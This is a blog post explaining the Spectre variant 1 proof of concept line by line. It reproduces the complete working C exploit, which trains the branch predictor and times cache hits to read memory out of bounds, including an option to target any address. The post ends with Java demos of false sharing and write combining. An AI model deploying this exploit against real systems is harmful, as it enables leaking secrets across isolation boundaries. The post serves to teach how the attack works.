Intel: Spectre & Meltdown side-channel attacks (2): the cache line at work

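The previous post covered the basic principle of Spectre and Meltdown together with a simple demo. This post studies the original proof of concept (PoC) published by the team that discovered the vulnerability: https://spectreattack.com/spectre.pdf

1. First, the output of a run, to give an intuitive picture: judging from the printed results, the PoC successfully recovers the contents of the secret string.

2. A detailed walkthrough of the code

(1) The two primitives at the heart of the exploit, rdtscp and clflush, are declared in these headers (intrin.h under MSVC, x86intrin.h otherwise):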

#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

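(2) array1: the array the attacker uses to reach the victim's memory. It is declared with 160 bytes, while the bounds check in victim_function compares against array1_size, which is 16. Later the attacker passes an index far beyond either limit in order to read the victim's memory out of bounds.

unused1 and unused2: on a multi-core CPU each core has its own L1 and L2 caches, and a cache is managed in units of lines, 64 bytes each on the processors discussed here. unused1 and unused2 are each exactly one cache line in size, and array1 (160 bytes) spans three lines, assuming the arrays happen to start on 64-byte boundaries (nothing in the code forces that alignment).

Under that assumption the three arrays occupy five different cache lines, which keeps array1 away from the lines of the neighbouring variables.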
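The line counting above can be checked with a few lines of C. This is only a sketch: lines_spanned and the CACHE_LINE constant are names I made up for illustration, and the 64-byte line size is an assumption that should be verified for the CPU at hand.

```c
#include <stddef.h>
#include <stdint.h>

#define CACHE_LINE 64u /* assumed line size in bytes; check your CPU */

/* Number of cache lines touched by an object of `size` bytes that
 * starts at address `addr`. */
static size_t lines_spanned(uintptr_t addr, size_t size)
{
    if (size == 0)
        return 0;
    uintptr_t first = addr / CACHE_LINE;              /* line of the first byte */
    uintptr_t last = (addr + size - 1) / CACHE_LINE;  /* line of the last byte */
    return (size_t)(last - first + 1);
}
```

With a line-aligned start address, a 64-byte array gives 1 and a 160-byte array gives 3, which matches the count in the text. If the same 160-byte array starts 48 bytes into a line, it touches 4 lines, which is why the "five lines" figure depends on alignment.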

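array2: the probe array. Each unit of the secret is one byte, so there are 256 possible values (0 to 255) and array2 needs 256 slots. Each slot is 512 bytes wide. Note that this is a stride in bytes, not the 512 bits of a single 64-byte cache line: 512 bytes is 8 cache lines, so two different byte values can never map to the same line, and the wide stride is generally assumed to make it harder for the hardware prefetcher to pull neighbouring slots into the cache.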

uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
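uint8_t array2[256 * 512];//(1) each unit of the secret is 1 byte, so there are 256 possible values; (2) a cache line is 64 bytes (512 bits), and the 512-byte stride puts the slot of each value on its own cache line; (3) shared between the attacker and the victim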
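To make the layout of array2 concrete, here is a small sketch of how a byte value maps to a probe slot. probe_offset, lines_between_slots and the two constants are illustrative names of mine, not part of the PoC, and the 64-byte line size is again an assumption.

```c
#include <stddef.h>

#define CACHE_LINE 64u    /* assumed cache line size in bytes */
#define PROBE_STRIDE 512u /* bytes between probe slots, as in array2[256 * 512] */

/* Byte offset inside array2 of the slot that encodes the value `v`. */
static size_t probe_offset(unsigned char v)
{
    return (size_t)v * PROBE_STRIDE;
}

/* How many cache lines apart two neighbouring probe slots are. */
static size_t lines_between_slots(void)
{
    return PROBE_STRIDE / CACHE_LINE;
}
```

For example, the first secret character 'T' (0x54, decimal 84) maps to offset 43008, and neighbouring slots are 8 cache lines apart.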

(3) This is the victim's data, i.e. the data the attacker is trying to recover:

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

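(4) array1 is declared with 160 elements and array1_size is 16, but at certain moments the attacker passes in a far larger index. During speculative execution the out-of-bounds read reaches the secret, and the dependent load from array2 pulls one line into the cache. When the if condition later turns out to be false, the CPU rolls back the register state, but the cached line stays where it is: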

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
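    if (x < array1_size)//array1_size is not in the cache and has to be fetched from memory, which is slow, so the CPU speculatively executes the statement below
    {
        temp &= array2[array1[x] * 512];//array1 holds 160 bytes, but x can be far larger (e.g. malicious_x defined in main), which reaches into the memory that holds secret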
    }
}

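(5) The threshold for deciding whether an access was a cache hit. The value was found by repeated experiments rather than derived from theory, so it may need tuning on a different machine:

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold; 80 was found by repeated experiments, not derived from theory */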
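Since the threshold is empirical, one way to pick it is to collect latency samples for accesses known to hit and known to miss, then place the threshold between the two medians. The sketch below covers only that last step. pick_threshold and median_u64 are hypothetical helpers of mine; the PoC itself simply hard-codes 80.

```c
#include <stdint.h>
#include <stdlib.h>

/* qsort comparator for uint64_t values. */
static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n samples (n > 0); sorts the caller's array in place. */
static uint64_t median_u64(uint64_t *samples, size_t n)
{
    qsort(samples, n, sizeof samples[0], cmp_u64);
    return samples[n / 2];
}

/* Hypothetical helper: midpoint between the median hit latency and the
 * median miss latency. Using medians keeps single outliers (interrupts,
 * context switches) from shifting the result. */
static uint64_t pick_threshold(uint64_t *hit, size_t n_hit,
                               uint64_t *miss, size_t n_miss)
{
    uint64_t h = median_u64(hit, n_hit);
    uint64_t m = median_u64(miss, n_miss);
    if (m <= h)
        return h; /* distributions overlap; the measurement is not usable */
    return h + (m - h) / 2;
}
```

The samples themselves would come from timing loops like the one in readMemoryByte, once right after touching an address and once right after flushing it with clflush.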

(6) Reset the counters that record how often each byte value produced a cache hit:

for (i = 0; i < 256; i++)
        results[i] = 0;

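(7) Flush every array2 probe slot out of the CPU cache, so that lines left over from earlier do not distort the timing:

for (i = 0; i < 256; i++)//flush each probe slot from the cache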
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

(8) Evict array1_size from the CPU cache. The empty loop that follows gives the flush time to complete:

 _mm_clflush(&array1_size);//evict array1_size from the cache
 for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it; volatile makes the compiler emit a real load and store of z on every iteration, otherwise the empty loop could be optimized away
 {/* Delay (can also mfence) */
 }

(9) This computes the index into array1. The bit manipulation is hard to follow from the code alone, so it helps to print some values first:

x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));

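The constructed x values follow a clear pattern with a period of six. In each cycle the first five values of x are 7 (training_x = tries % array1_size = 999 % 16 = 7), which is within array1_size, so the if condition holds. The sixth value is far larger than array1_size, so the condition fails. The CPU's branch predictor, however, guesses the outcome of a branch from its recent history. Five taken branches in a row lead it to predict that the sixth is taken as well, so the CPU speculatively executes temp &= array2[array1[x] * 512] and pulls the array2 line selected by the victim's byte into the cache. Once x has been computed, victim_function() is called.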

j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
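The printed pattern can be reproduced in isolation. The sketch below wraps the three bit-twiddling lines of the PoC in a function; select_x is a name I introduced, and j is assumed to be non-negative as in the PoC loop (29 down to 0).

```c
#include <stddef.h>

/* Branch-free choice between training_x and malicious_x.
 * Returns malicious_x when j % 6 == 0, otherwise training_x. */
static size_t select_x(int j, size_t training_x, size_t malicious_x)
{
    /* (j % 6) - 1 is -1 only when j % 6 == 0; masking with ~0xFFFF keeps
     * the high bits of -1 and turns the values 0..4 into 0. */
    size_t x = ((j % 6) - 1) & ~0xFFFF;
    /* Fill in the low 16 bits: x is now all ones or all zeros. */
    x = x | (x >> 16);
    /* With an all-ones mask the XOR swaps training_x for malicious_x;
     * with a zero mask training_x passes through unchanged. */
    return training_x ^ (x & (malicious_x ^ training_x));
}
```

Over j = 29..0 this returns malicious_x for j = 24, 18, 12, 6 and 0, i.e. 5 attack runs among 30 calls. Doing the selection with arithmetic instead of an if keeps an extra conditional jump out of the loop, which is the reason given in the PoC's own comment ("Avoid jumps in case those tip off the branch predictor").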

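(10) After victim_function has run, read every array2 slot again and time each access. The slot that is read fastest (a cache hit) corresponds to the byte value stored in the victim's memory: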

/* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
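            mix_i = ((i * 167) + 13) & 255;//1. shuffle the order in which the slots are read, so the CPU cannot predict and prefetch them; 2. & 255 (0xFF) keeps only the low 8 bits, which is the same as % 256 for these non-negative values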
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }
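One thing worth convincing yourself of is that the shuffled order still visits every slot exactly once. Because 167 is odd, multiplying by it modulo 256 is a bijection, so mix_i is a permutation of 0..255. A quick sketch to check this (mix and mix_is_permutation are my own names):

```c
#include <string.h>

/* Same formula as mix_i in the PoC. */
static int mix(int i)
{
    return ((i * 167) + 13) & 255;
}

/* Returns 1 when mix() visits every value 0..255 exactly once
 * for i = 0..255, and 0 if any value repeats. */
static int mix_is_permutation(void)
{
    unsigned char seen[256];
    memset(seen, 0, sizeof seen);
    for (int i = 0; i < 256; i++) {
        int m = mix(i);
        if (seen[m])
            return 0; /* value visited twice, so some other value is missed */
        seen[m] = 1;
    }
    return 1;
}
```

The first few indices come out as 13, 180, 91, so consecutive probes are far apart in array2 rather than one fixed stride away from each other.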

(11) Next, scan the counters and pick the two byte values with the highest hit counts (the best guess and the runner-up):

/* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
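The scan and the early-exit test are easier to experiment with as standalone functions. This sketch copies the PoC logic unchanged; top_two and is_clear_winner are names I chose for illustration.

```c
/* Find the index with the highest tally (best) and the runner-up (second),
 * using the same single-pass scan as the PoC. Ties go to the later index
 * because the comparisons use >=. */
static void top_two(const int results[256], int *best, int *second)
{
    int j = -1, k = -1;
    for (int i = 0; i < 256; i++) {
        if (j < 0 || results[i] >= results[j]) {
            k = j; /* the previous best becomes the runner-up */
            j = i;
        } else if (k < 0 || results[i] >= results[k]) {
            k = i;
        }
    }
    *best = j;
    *second = k;
}

/* Early-exit rule from the PoC: stop retrying once the best score is at
 * least 2 * runner-up + 5, or in the special case of 2 hits against 0. */
static int is_clear_winner(int best_score, int second_score)
{
    return best_score >= 2 * second_score + 5 ||
           (best_score == 2 && second_score == 0);
}
```

Note that the scan is not a full sort: it only tracks two indices, which is all readMemoryByte needs to report value[0] and value[1].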

(12) Moving on to main: this is the offset from array1 to the target memory:

size_t malicious_x = (size_t)(secret - (char*)array1);

It is then passed to readMemoryByte, which probes the target one byte at a time:

printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);
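The offset trick relies on unsigned wrap-around: even when the target lies below array1 in memory, the "negative" distance becomes a huge size_t (such as 18446744073707453224 in the output above), and adding it back to the base address wraps around to the target. A minimal sketch, assuming a flat address space and going through uintptr_t instead of subtracting unrelated pointers directly; offset_from and apply_offset are hypothetical helpers, not PoC functions.

```c
#include <stddef.h>
#include <stdint.h>

/* Offset that, added to `base`, lands on `target`. The subtraction is done
 * on unsigned integers, so it wraps modulo 2^N instead of going negative. */
static size_t offset_from(const void *base, const void *target)
{
    return (size_t)((uintptr_t)target - (uintptr_t)base);
}

/* Inverse operation: the address reached by indexing `base` with `offset`. */
static const unsigned char *apply_offset(const void *base, size_t offset)
{
    return (const unsigned char *)((uintptr_t)base + offset);
}
```

In the PoC the same effect comes from array1[x] with x = malicious_x: the address computation array1 + x wraps in exactly this way, and malicious_x++ then walks through the secret byte by byte.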

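(13) Compared with the PoC in https://www.cnblogs.com/theseventhson/p/13282921.html, this demo adds two features:

It trains (misleads) the CPU's branch predictor into assuming that the next if condition holds, so that the if body is executed speculatively.
Besides probing the contents of secret, it lets the user specify the target address and the number of bytes to probe, as follows: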

    if (argc == 3)//first argument: target address; second argument: number of bytes to read
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert the input address into an offset relative to array1 */
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }
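The PoC ignores the return values of sscanf_s, so a malformed argument silently leaves malicious_x or len in an unexpected state. As a sketch of a slightly more defensive variant, here is the same parsing with standard sscanf and explicit checks. parse_target is a hypothetical helper of mine, and the round trip through "%p" is implementation-defined, so treat this as an illustration rather than portable code.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Parse "<address> <length>" style arguments into an offset relative to
 * `base` and a byte count. Returns 1 on success, 0 on any parse error.
 * The outputs are only written on success. */
static int parse_target(const char *addr_str, const char *len_str,
                        const void *base, size_t *offset, int *len)
{
    void *target = NULL;
    int n = 0;

    if (sscanf(addr_str, "%p", &target) != 1)
        return 0; /* not a pointer value */
    if (sscanf(len_str, "%d", &n) != 1 || n <= 0)
        return 0; /* not a positive byte count */

    *offset = (size_t)((uintptr_t)target - (uintptr_t)base);
    *len = n;
    return 1;
}
```

In main this would be called with argv[1], argv[2] and array1 as the base, falling back to the default malicious_x and len when it returns 0.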

The complete code follows (the key points are in the comments):

#include <stdio.h> 
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers */
#ifndef _MSC_VER
#define sscanf_s sscanf
#endif

/********************************************************************
Victim code.
********************************************************************/;
unsigned int array1_size = 16;
uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
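uint8_t array2[256 * 512];//(1) each unit of the secret is 1 byte, so there are 256 possible values; (2) a cache line is 64 bytes (512 bits), and the 512-byte stride puts the slot of each value on its own cache line; (3) shared between the attacker and the victim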

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
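    if (x < array1_size)//array1_size is not in the cache and has to be fetched from memory, which is slow, so the CPU speculatively executes the statement below
    {
        temp &= array2[array1[x] * 512];//array1 holds 160 bytes, but x can be far larger (e.g. malicious_x defined in main), which reaches into the memory that holds secret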
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold; 80 was found by repeated experiments, not derived from theory */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
    static int results[256];//per byte value: how many times its probe slot was a cache hit
    int tries, i, j, k, mix_i;
    unsigned int junk = 0;
    size_t training_x, x;
    register uint64_t time1, time2;
    volatile uint8_t* addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--)
    {
        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)//flush each probe slot from the cache
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;//training_x = 0~15
        for (j = 29; j >= 0; j--)
        {
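            _mm_clflush(&array1_size);//evict array1_size from the cache
            for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it; volatile makes the compiler emit a real load and store of z on every iteration, otherwise the empty loop could be optimized away
            {/* Delay (can also mfence) */
            }
            /* In every group of 6 iterations, 5 use a small x for which the if condition holds; the 6th uses a huge x for which it fails, but because the previous 5 branches were taken the CPU still executes the if body speculatively. The 5 small values train the branch predictor so that the 6th call can "fool" it. */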
            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);//x is an offset relative to array1 and can reach into the secret string
        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
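            mix_i = ((i * 167) + 13) & 255;//1. shuffle the order in which the slots are read, so the CPU cannot predict and prefetch them; 2. & 255 (0xFF) keeps only the low 8 bits, which is the same as % 256 for these non-negative values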
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
}

int main(int argc, const char** argv)
{
    printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));
    size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x: the distance from array1 to the secret string; the actual value depends on where the linker places the two objects */
    int score[2], len = strlen(secret);
    uint8_t value[2];

    for (size_t i = 0; i < sizeof(array2); i++)//array2[256 * 512]
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3)//first argument: target address; second argument: number of bytes to read
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert the input address into an offset relative to array1 */
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0)
    {
        printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X='%c' score=%d ", value[0],
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X='%c' score=%d)", value[1],
                (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
                score[1]);
        printf("\n");
    }
#ifdef _MSC_VER
    printf("Press ENTER to exit\n");
    getchar();    /* Pause Windows console */
#endif
    return (0);
}

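To get a more direct feel for what a cache line does, compare the two programs below. They are structurally identical; the only difference is which array elements are updated. In the first program the two threads write to elements that sit in the same cache line; in the second they write to elements in different cache lines. A cache line is kept coherent as a unit: when thread 1 writes arr[0], the MESI cache-coherence protocol invalidates the copy of that line held by the core running thread 2, and when thread 2 writes arr[1] the same happens in the other direction. The two cores keep invalidating each other's copy (false sharing), and throughput drops. In the second program the two elements are 64 bytes apart (8 longs of 8 bytes each), so they cannot be in the same 64-byte cache line. Each core keeps its own line, the writes no longer trigger coherence traffic between the two cores, and a lot of time is saved.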

public class T03_CacheLinePadding {

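    //the two longs take 16 bytes in total and most likely share one cache line; note that Java array elements cannot be declared volatile, so nothing here forces each store out to memory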
    public static long[] arr = new long[2];

    public static void main(String[] args) throws Exception {
        Thread t1 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[0] = i;
            }
        });

        Thread t2 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[1] = i;
            }
        });

        final long start = System.nanoTime();
        t1.start();
        t2.start();
        t1.join();
        t2.join();
        System.out.println((System.nanoTime() - start)/100_0000);
    }
}

public class T04_CacheLinePadding {
//arr[0] and arr[8] are in two different cache lines, so this runs faster than the version above where both elements share one line
    public static long[] arr = new long[16];

    public static void main(String[] args) throws Exception {
        Thread t1 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[0] = i;//the two threads write to different cache lines
            }
        });

        Thread t2 = new Thread(()->{
            for (long i = 0; i < 10000_0000L; i++) {
                arr[8] = i;//the two threads write to different cache lines
            }
        });

        final long start = System.nanoTime();
        t1.start();
        t2.start();
        t1.join();
        t2.join();
        System.out.println((System.nanoTime() - start)/100_0000);
    }
}
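The same padding idea can be written down in C, the language of the PoC, where the layout is explicit. This is only a sketch of the layout, not a benchmark: the struct names and same_cache_line are my own, the 64-byte line size is an assumption, and same_cache_line further assumes the enclosing object starts on a line boundary. In Java the array header shifts the elements, so arr[0] is not necessarily at the start of a line.

```c
#include <stdalign.h>
#include <stddef.h>

#define CACHE_LINE 64 /* assumed cache line size in bytes */

/* Two counters packed next to each other: 16 bytes on a typical 64-bit
 * target, so they will usually share one cache line (like arr[0], arr[1]). */
struct shared_counters {
    long a;
    long b;
};

/* Each counter aligned to its own cache line (like arr[0], arr[8]). */
struct padded_counters {
    alignas(CACHE_LINE) long a;
    alignas(CACHE_LINE) long b;
};

/* 1 if two byte offsets inside a line-aligned object fall in the same line. */
static int same_cache_line(size_t off_a, size_t off_b)
{
    return off_a / CACHE_LINE == off_b / CACHE_LINE;
}
```

With padded_counters, one thread can update a and another b without the two cores invalidating each other's line, at the cost of 128 bytes instead of 16.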

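Here is a comparison of access latency across the levels of the storage hierarchy, which makes the difference very concrete:

(14) Besides the L1/L2/L3 caches above, the CPU also has write-combining (WC) buffers that sit even closer to the core than L1. They are a scarce resource: the figure usually quoted is 4 buffers on some Intel CPUs (a number of buffers, not 4 bytes). Stores are collected in a buffer and then written out to the outer cache together. Below is mashibing's test code: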

public final class WriteCombining {

    private static final int ITERATIONS = Integer.MAX_VALUE;
    private static final int ITEMS = 1 << 24;
    private static final int MASK = ITEMS - 1;

    private static final byte[] arrayA = new byte[ITEMS];
    private static final byte[] arrayB = new byte[ITEMS];
    private static final byte[] arrayC = new byte[ITEMS];
    private static final byte[] arrayD = new byte[ITEMS];
    private static final byte[] arrayE = new byte[ITEMS];
    private static final byte[] arrayF = new byte[ITEMS];

    public static void main(final String[] args) {

        for (int i = 1; i <= 3; i++) {
            System.out.println(i + " SingleLoop duration (ns) = " + runCaseOne());//13649087180
            System.out.println(i + " SplitLoop  duration (ns) = " + runCaseTwo());//6030710315
        }
    }
    /* Each iteration writes to 6 different arrays, i.e. to 6 different cache lines.
       If only about 4 write-combining buffers are available (the commonly quoted figure,
       taken as an assumption here), the 6 pending lines cannot all be buffered at once:
       a buffer has to be drained to the outer cache before the remaining writes can proceed,
       and that wait slows down the whole while loop. */
    public static long runCaseOne() {
        long start = System.nanoTime();
        int i = ITERATIONS;

        while (--i != 0) {
            int slot = i & MASK;
            byte b = (byte) i;
            arrayA[slot] = b;
            arrayB[slot] = b;
            arrayC[slot] = b;
            arrayD[slot] = b;
            arrayE[slot] = b;
            arrayF[slot] = b;
        }
        return System.nanoTime() - start;
    }
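    /* Each loop writes to only 3 arrays, i.e. to 3 cache lines at a time,
       which fits within the available write-combining buffers.
       Although the work is split into two loops, it is considerably faster than writing
       6 arrays in one loop, because the buffers are never oversubscribed.
       This is what making full use of write combining means here. */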
    public static long runCaseTwo() {
        long start = System.nanoTime();
        int i = ITERATIONS;
        while (--i != 0) {
            int slot = i & MASK;
            byte b = (byte) i;
            arrayA[slot] = b;
            arrayB[slot] = b;
            arrayC[slot] = b;
        }
        i = ITERATIONS;
        while (--i != 0) {
            int slot = i & MASK;
            byte b = (byte) i;
            arrayD[slot] = b;
            arrayE[slot] = b;
            arrayF[slot] = b;
        }
        return System.nanoTime() - start;
    }
}

References:

https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre (code walkthrough)

https://bbs.pediy.com/thread-254288.htm https://xz.aliyun.com/t/6332 (leaking sensitive information across processes)

https://bbs.pediy.com/thread-256190.htm (side-channel analysis of the Intel processor L3 cache)

https://www.bilibili.com/video/BV1ve411s71j/?spm_id_from=trigger_reload (马士兵 (mashibing): how volatile is implemented across five layers)

https://www.bilibili.com/video/BV1S34y1m7sX?p=27 (the reordering problem)

Posted 2020-07-14 22:50 by 第七子007
